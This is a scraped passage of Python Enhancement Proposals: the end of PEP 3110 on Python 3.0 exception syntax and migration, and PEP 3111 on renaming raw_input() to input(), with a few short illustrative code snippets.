Both of these cases can be handled by Guido van Rossum’s 2to3
utility [7] using the except fixer [8].
except clauses with tuple targets will need to be converted
manually, on a case-by-case basis. These changes will usually need
to be accompanied by changes to the exception classes themselves.
While these changes generally cannot be automated, the 2to3
utility is able to point out cases where the target of an except
clause is a tuple, simplifying conversion.
Situations where it is necessary to keep an exception instance around
past the end of the except suite can be easily translated like so
try:
...
except E as N:
...
...
becomes
try:
...
except E as N:
n = N
...
...
This way, when N is deleted at the end of the block, n will
persist and can be used as normal.
Lastly, all uses of the sys module’s exc_type, exc_value
and exc_traceback attributes will need to be removed. They can be
replaced with sys.exc_info()[0], sys.exc_info()[1] and
sys.exc_info()[2] respectively, a transformation that can be
performed by 2to3’s sysexcattrs fixer.
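For example (a sketch of the mechanical rewrite, not tool output copied verbatim):
import sys

try:
    1 / 0
except ZeroDivisionError:
    exc_type, exc_value, exc_tb = sys.exc_info()
    # replaces the old sys.exc_type / sys.exc_value / sys.exc_traceback
    print(exc_type.__name__, exc_value)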
2.6 - 3.0 Compatibility
In order to facilitate forwards compatibility between Python 2.6 and 3.0,
the except ... as ...: syntax will be backported to the 2.x series. The
grammar will thus change from:
except_clause: 'except' [test [',' test]]
to:
except_clause: 'except' [test [('as' | ',') test]]
The end-of-suite cleanup semantic for except statements will not be
included in the 2.x series of releases.
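For example (an invented snippet, not from the PEP), the following runs unchanged on both 2.6 and 3.0 thanks to the backported syntax:
try:
    value = int("not a number")
except ValueError as err:
    value = 0
    print(err)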
Open Issues
Replacing or Dropping “sys.exc_info()”
The idea of dropping sys.exc_info() or replacing it with a
sys.exception attribute or a sys.get_exception() function
has been raised several times on python-3000 ([9],
[10]) and mentioned in PEP 344’s “Open Issues” section.
While a 2to3 fixer to replace calls to sys.exc_info()
and some attribute accesses would be trivial, it would be far more
difficult for static analysis to find and fix functions that expect
the values from sys.exc_info() as arguments. Similarly, this does
not address the need to rewrite the documentation for all APIs that
are defined in terms of sys.exc_info().
Implementation
This PEP was implemented in revisions 53342 [11] and 53349
[12]. Support for the new except syntax in 2.6 was
implemented in revision 55446 [13].
References
[1]
http://docs.python.org/library/sys.html
[2]
https://mail.python.org/pipermail/python-dev/2006-March/062449.html
[3]
https://mail.python.org/pipermail/python-dev/2006-March/062640.html
[4]
http://docs.python.org/reference/compound_stmts.html#try
[5]
https://mail.python.org/pipermail/python-3000/2007-January/005395.html
[6]
http://svn.python.org/view?rev=53342&view=rev
[7]
https://hg.python.org/sandbox/guido/file/2.7/Lib/lib2to3/
[8]
https://hg.python.org/sandbox/guido/file/2.7/Lib/lib2to3/fixes/fix_except.py
[9]
https://mail.python.org/pipermail/python-3000/2007-January/005385.html
[10]
https://mail.python.org/pipermail/python-3000/2007-January/005604.html
[11]
http://svn.python.org/view?view=revision&revision=53342
[12]
http://svn.python.org/view?view=revision&revision=53349
[13]
http://svn.python.org/view/python/trunk/?view=rev&rev=55446
Copyright
This document has been placed in the public domain.
| Final | PEP 3110 – Catching Exceptions in Python 3000 | Standards Track | This PEP introduces changes intended to help eliminate ambiguities
in Python’s grammar, simplify exception classes, simplify garbage
collection for exceptions and reduce the size of the language in
Python 3.0. |
PEP 3111 – Simple input built-in in Python 3000
Author:
Andre Roberge <andre.roberge at gmail.com>
Status:
Final
Type:
Standards Track
Created:
13-Sep-2006
Python-Version:
3.0
Post-History:
22-Dec-2006
Table of Contents
Abstract
Motivation
Rationale
Specification
Naming Discussion
References
Copyright
Abstract
Input and output are core features of computer programs. Currently,
Python provides a simple means of output through the print keyword
and two simple means of interactive input through the input()
and raw_input() built-in functions.
Python 3.0 will introduce various incompatible changes with previous
Python versions (PEP 3100).
Among the proposed changes, print will become a built-in
function, print(), while input() and raw_input() would be removed completely
from the built-in namespace, requiring importing some module to provide
even the most basic input capability.
This PEP proposes that Python 3.0 retains some simple interactive user
input capability, equivalent to raw_input(), within the built-in namespace.
It was accepted by the BDFL in December 2006 [5].
Motivation
With its easy readability and its support for many programming styles
(e.g. procedural, object-oriented, etc.) among others, Python is perhaps
the best computer language to use in introductory programming classes.
Simple programs often need to provide information to the user (output)
and to obtain information from the user (interactive input).
Any computer language intended to be used in an educational setting should
provide straightforward methods for both output and interactive input.
The current proposals for Python 3.0
include a simple output pathway
via a built-in function named print(), but a more complicated method for
input [e.g. via sys.stdin.readline()], one that requires importing an external
module. Current versions of Python (pre-3.0) include raw_input() as a
built-in function. With the availability of such a function, programs that
require simple input/output can be written from day one, without requiring
discussions of importing modules, streams, etc.
Rationale
Current built-in functions, like input() and raw_input(), are found to be
extremely useful in traditional teaching settings. (For more details,
see [2] and the discussion that followed.)
While the BDFL has clearly stated [3] that input() was not to be kept in
Python 3000, he has also stated that he was not against revising the
decision of killing raw_input().
raw_input() provides a simple means to ask a question and obtain a response
from a user. The proposed plans for Python 3.0 would require the replacement
of the single statement:
name = raw_input("What is your name?")
by the more complicated:
import sys
print("What is your name?")
name = sys.stdin.readline()
However, from the point of view of many Python beginners and educators, the
use of sys.stdin.readline() presents the following problems:
1. Compared to the name “raw_input”, the name “sys.stdin.readline()”
is clunky and inelegant.
2. The names “sys” and “stdin” have no meaning for most beginners,
who are mainly interested in what the function does, and not where
in the package structure it is located. The lack of meaning also makes
it difficult to remember:
is it “sys.stdin.readline()”, or “stdin.sys.readline()”?
To a programming novice, there is no obvious reason to prefer
one over the other. In contrast, simple and direct function names like
print, input, raw_input, and open are easier to remember.
3. The use of “.” notation is unmotivated and confusing to many beginners.
For example, it may lead some beginners to think “.” is a standard
character that could be used in any identifier.
4. There is an asymmetry with the print function: why is print not called
sys.stdout.print()?
Specification
The existing raw_input() function will be renamed to input().
The Python 2 to 3 conversion tool will replace calls to input() with
eval(input()) and raw_input() with input().
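Concretely (an illustrative sketch of the conversion, not tool output copied verbatim):
# Python 2.x source:
#     name = raw_input("What is your name? ")
#     age = int(input("How old are you? "))

# After conversion to Python 3.0:
name = input("What is your name? ")
age = int(eval(input("How old are you? ")))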
Naming Discussion
With input() effectively removed from the language,
the name raw_input() makes much less sense and alternatives should be
considered. The various possibilities mentioned in various forums include:
ask()
ask_user()
get_string()
input() # initially rejected by BDFL, later accepted
prompt()
read()
user_input()
get_response()
While it was initially rejected by the BDFL, it has been suggested that the
most direct solution would be to rename “raw_input” to “input” in Python 3000.
The main objection is that Python 2.x already has a function named “input”,
and, even though it is not going to be included in Python 3000,
having a built-in function with the same name but different semantics may
confuse programmers migrating from 2.x to 3000. Certainly, this is no problem
for beginners, and the scope of the problem is unclear for more experienced
programmers, since raw_input(), while popular with many, is not in
universal use. In this instance, the good it does for beginners could be
seen to outweigh the harm it does to experienced programmers -
although it could cause confusion for people reading older books or tutorials.
The rationale for accepting the renaming can be found here [4].
References
[2]
The fate of raw_input() in Python 3000
https://mail.python.org/pipermail/edu-sig/2006-September/006967.html
[3]
Educational aspects of Python 3000
https://mail.python.org/pipermail/python-3000/2006-September/003589.html
[4]
Rationale for going with the straight renaming
https://mail.python.org/pipermail/python-3000/2006-December/005249.html
[5]
BDFL acceptance of the PEP
https://mail.python.org/pipermail/python-3000/2006-December/005257.html
Copyright
This document has been placed in the public domain.
| Final | PEP 3111 – Simple input built-in in Python 3000 | Standards Track | Input and output are core features of computer programs. Currently,
Python provides a simple means of output through the print keyword
and two simple means of interactive input through the input()
and raw_input() built-in functions. |